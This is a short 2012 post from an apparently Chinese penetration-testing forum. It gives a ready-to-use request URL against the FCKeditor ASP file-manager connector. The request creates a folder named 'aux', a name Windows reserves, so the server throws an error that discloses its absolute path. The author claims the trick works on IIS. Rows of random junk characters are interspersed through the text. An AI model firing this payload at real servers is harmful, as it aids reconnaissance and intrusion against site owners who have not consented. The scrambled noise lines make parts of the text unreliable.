中国网络渗透测试联盟
标题:
最新FCKeditor爆绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:39
标题:
最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
, `% R3 M' ?& n! a
) M* y c$ Y; M5 H+ \3 J
8 j- T( B) z1 Q) P$ p/ v6 Y
版本未测试。。。
8 D: O9 D, U+ b. m
2 W2 i5 b4 H' [/ I7 s3 |; c
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
3 [; c5 S& A; |3 x
o* V, h9 {, R, ^# v& D! x
3 A0 a7 C' W1 T/ H- u; v V. h
听说IIS都可以。。
1 v, r. O0 v! X" D- U3 X3 K* U
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2